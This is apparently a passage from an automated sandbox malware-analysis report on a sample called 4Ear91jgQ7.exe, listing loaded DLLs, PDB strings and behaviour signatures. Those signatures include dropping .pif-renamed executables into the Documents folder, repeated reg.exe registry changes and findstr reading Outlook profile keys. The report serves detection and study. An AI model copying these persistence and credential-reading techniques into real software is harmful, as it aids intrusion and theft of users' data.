            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rasman.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rtutils.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: winhttp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: winnsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: secur32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: sspicli.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: schannel.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ntasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ncrypt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: msasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: gpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: amsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: userenv.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: mscoree.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: version.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: windows.storage.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: wldp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: profapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: cryptsp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rsaenh.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: cryptbase.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rasapi32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rasman.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rtutils.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: winhttp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: winnsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: secur32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: sspicli.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: schannel.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ntasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ncrypt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: msasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: gpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: amsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: userenv.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: wbemcomn.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: mscoree.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: apphelp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: version.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: windows.storage.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: wldp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: profapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: cryptsp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: rsaenh.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: cryptbase.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: rasapi32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: rasman.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: rtutils.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: winhttp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: winnsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: secur32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: sspicli.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: schannel.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ntasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ncrypt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: msasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: gpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: amsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: userenv.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: 4Ear91jgQ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 4Ear91jgQ7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 4Ear91jgQ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000690D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: sers\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdbllu# source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: uu.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: findstr.pdb source: RegAsm.exe, 00000007.00000002.2374528641.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3323723136.000000000138E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: findstr.exe, 00000012.00000002.3330731863.00000000039CC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2481196233.000000000336C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002F59C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\pif\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2376548973.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.000000000353E000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2373359020.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Elaniabdv.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbL source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: oC:\Users\user\Documents\Elaniabdv.pdbd source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\pif\Elaniabdv.pdbbq source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Elaniabdv.pdb[ source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\pif\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000690D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbH source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdb37-8B11-F424491E3931}\Servererver32mmon Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0 source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3320587311.0000000000EDE000.00000002.00000001.01000000.00000008.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3320993994.0000000000EDE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: C:\Windows\Elaniabdv.pdbpdbbdv.pdbdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.PDB source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Dynamic.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: mscorlib.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb7 source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: findstr.exe, 00000012.00000002.3330731863.00000000039CC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2481196233.000000000336C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002F59C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: findstr.pdbGCTL source: RegAsm.exe, 00000007.00000002.2374528641.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3323723136.000000000138E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Dynamic.pdb.> source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Xml.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: Microsoft.CSharp.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2376548973.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.000000000353E000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2373359020.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: n4C:\Windows\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Xml.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: o.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: symbols\pif\Elaniabdv.pdbd source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.0000000001372000.00000004.00000020.00020000.00000000.sdmp, WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Drawing.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Users\user\Documents\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdb source: 4Ear91jgQ7.exe, 4Ear91jgQ7.pif.pif.pif.pif.pif.67.dr, 4Ear91jgQ7.pif.pif.pif.32.dr, 4Ear91jgQ7.pif.pif.pif.pif.pif.pif.74.dr, 4Ear91jgQ7.pif.pif.13.dr, 4Ear91jgQ7.pif.pif.pif.pif.48.dr, 4Ear91jgQ7.pif.5.dr
            Source: Binary string: System.Core.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.pdbMZ source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdbts\4Ear91jgQ7.pif.pif.pif.PDB source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: 4Ear91jgQ7.exeStatic PE information: 0xE66E8ABF [Fri Jul 4 10:02:39 2092 UTC]
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0641A028 push es; ret 0_2_0641A5F0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0641A5E0 push es; ret 0_2_0641A5F0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06416932 push es; ret 0_2_06416940
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477065 push es; ret 0_2_06477068
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0647706D push es; ret 0_2_06477070
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477069 push es; ret 0_2_0647706C
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477015 push es; ret 0_2_06477024
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477011 push es; ret 0_2_06477014
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477025 push es; ret 0_2_0647702C
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0647702D push es; ret 0_2_06477038
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477039 push es; ret 0_2_0647703C
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06473091 push es; ret 0_2_064730A0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064790A1 push es; ret 0_2_064790D0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06476FD7 push es; ret 0_2_06476FE0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06476FE1 push es; ret 0_2_06477010
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0647E878 push eax; iretd 0_2_0647E879
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0647E8D2 pushad ; iretd 0_2_0647E8D9
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064A3018 push es; retf 0_2_064A3CC8
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064D7A12 push es; ret 0_2_064D7A20
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064D79C0 push es; ret 0_2_064D7A20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004017BF push ds; iretd 7_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040A8C2 push ss; iretd 7_2_0040A921
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041A881 push esp; iretd 7_2_0041A882
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041E8B7 push ss; ret 7_2_0041E8BD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004051A1 push ebp; ret 7_2_004051A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004019BF push ds; iretd 7_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00401B31 push ds; iretd 7_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00403500 push eax; ret 7_2_00403502
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041CD8C push edx; iretd 7_2_0041CD8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00407643 pushfd ; iretd 7_2_0040765A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00407638 pushfd ; iretd 7_2_0040765A

            Persistence and Installation Behavior

            barindex
            Drops PE files to the document folder of the user
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pifJump to dropped file
            Drops PE files with a suspicious file extension
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pifJump to dropped file
            Uses cmd line tools excessively to alter registry or file data
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
